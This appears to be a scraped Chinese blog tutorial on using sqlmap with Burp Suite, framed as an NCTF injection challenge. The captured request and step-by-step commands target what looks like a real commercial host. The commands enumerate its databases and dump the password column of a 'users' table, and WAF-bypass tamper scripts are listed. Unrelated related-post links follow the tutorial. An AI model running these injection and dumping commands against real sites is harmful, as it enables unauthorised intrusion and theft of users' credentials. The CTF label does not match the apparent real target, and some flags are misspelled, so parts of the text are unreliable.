sqlmap教程(burpsuit辅助)
一道nctf的注入题目
具体的步骤如下:
sqlmap注入命令1
sqlmap注入命令2
第一步 burpsuit获取报头
运用burpsuit抓包,获取http报头
GET /services.php?id=4 HTTP/1.1
Host: www.backstagecommerce.ca
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __cfduid=d8e66c3c7470ab2dae745171ba4dccd181469886263; _ga=GA1.2.1383706248.1469886265
Connection: close
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
第二步 报头存档
这一步将上面内容存在test.txt里面
第三步 爆出现在使用的数据库
利用sqlmap,进行自动注入
执行语句
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dbs
//-p 跟的是参数这里为id 想要暴库就输入--dbs
- 1
- 2
- 1
- 2
利用这句代码报数据库内容
爆出了数据库
或者利用下面代码爆出当前使用的数据库
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --current-db
- 1
- 1
当前使用的数据库为’db1052699_bsc’
第四步 爆出数据库中有用的数据表
利用下面语句爆数据库里的数据表
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --tables -D "db1052699_bsc"
- 1
- 1
看到了users的数据表,接下来下面就来爆字段啦
第五步 爆数据表中的字段
利用下面语句爆字段
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --columns -T "users" -D "db1052699_bsc"
- 1
- 1
看到了password字段,接下来就要爆内容啦
第六步 爆出有用字段的内容
最后一步爆字段内容
sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dump -T "users" -D "db1052699_bsc" -C "password"
- 1
- 1
密码被爆破出来啦
--bacth
自动化
--tamper=charencode.py,modsecurityversioned.py,randomcase.py,space2morehash.py,varnish.py
加入绕过
sqlmap教程(burpsuit辅助)相关推荐
- 我的世界红石音乐高级教程 python辅助制作工具
我的世界红石音乐高级教程 python辅助制作工具 https://www.bilibili.com/video/av52803181/ QQ群:374821554 游戏资源下载(材质.MOD等)提取 ...
- 【双拼输入法】自然码辅助码入门教程(辅助码表)
0.摘要 本教程仅针对双拼中自然码方案的辅助码. 在学习辅助码之前,你应该已经能够熟练使用双拼输入法.点击这里:http://www.liuchuo.net/archives/2786有一份双拼输入法 ...
- 使用python玩跳一跳超详细使用教程/脚本辅助工具
本文首发于http://www.52aite.cn博客,没有知乎,没有微信公众号,只是蹭一波python跳一跳的热度. python辅助作者github账号为:wangshub. 作者的知乎专栏为:h ...
- Sqlmap教程:从入门到入狱指南
一.简介 sqlmap,一款开源的sql自动注入工具,可以用来检测和利用sql注入漏洞. 渗透平台:sqli-labs 二.常见命令 参数 作用 举例 -u 指定目标URL python sqlmap ...
- mvc ajax教程,MVC3----AJAX辅助方法
===================Ajax.ActionLink ActionLink方法可以创建一个具有一步行为的锚标签. 例如: 给页面一个链接,点击链接在当前页面显示信息,而不是打开一个新的 ...
- 详细的辅助开发教程,从入门到精通
大家玩游戏最烦的人应该是开挂的人了吧? 他们直接破坏了游戏的公平性和平衡性. 今天我们要给大家说的是辅助,不是外挂. 辅助的存在和外挂有一定的类似性,但是又是完全两样的. 比如,他们都是第三方软件/程 ...
- sqlmap使用手册(详细)
目录 前言 一.sqlmap简介 1.检测并利用SQL注入 2.直接连接到数据库管理系统 二.支持的技术 1.支持的数据库 2.支持的注入模式 三.用法 1.指定输出级别 2.指定目标 (1)直接连接 ...
- c语言单片机教程,开发板选择
单片机的学习过程十分重视实践操作,仿真软件不过是纸上谈兵,我们需要有一个看得见摸得着的学习工具,那就是单片机开发板! 1.教程所用的开发板 我们知道,学习C语言首先选择的是用哪一个软件做上机实践,那么 ...
- sqlmap的用法,sqlmap -r
sqlmap结合burpsuit进行sql注入漏洞查找; 配置好burpsuit和浏览器之间的代理,网上方法很多,创建一个记事本,准备写入参数使用: 1.在sqlmap根目录下创建list.txt,你 ...
- 最全的Matlab经典教程免费下载学习
薛定宇<高等应用数学问题的MATLAB求解>http://www.matlabsky.com/thread-177-1-1.html 樊京<MATLAB控制系统应用与实例>ht ...
最新文章
- 超级队长VR线下体验店落地上海,让娱乐突破想象
- kafka传递文件_从面试角度一文学完 Kafka
- Cannot complete the install because one or more required items could not be found.
- 教您怎么给移动硬盘加密
- CSS之【字体/文本样式】
- 持续集成mysql_持续集成环境搭建(5)zabbix搭建和使用
- 【通俗理解】锁存器,触发器,寄存器和缓冲器的区别
- 大熊猫学生网页设计模板 静态HTML动物保护学生网页作业成品 DIV CSS大熊猫野生动物主题静态网页
- 人工智能 - paddlepaddle飞桨 - 深度学习基础教程 - 线性回归
- 如何使用SQL Server主数据服务替换硬编码的查找
- PHP极其强大的图片处理库Grafika详细教程(4):图形绘制
- 深度学习解决NLP问题:语义相似度计算
- SSM-1-SSM整合
- 技术专题之-技术概述的目录
- Matlab学习:读取excel中数据
- Python的视频分析
- html考勤表格模板,Excel员工考勤表模板如何撤销工作表保护?
- 机器学习基石 作业二
- _beginthread, _beginthreadex
- Simulink转化为低版本文件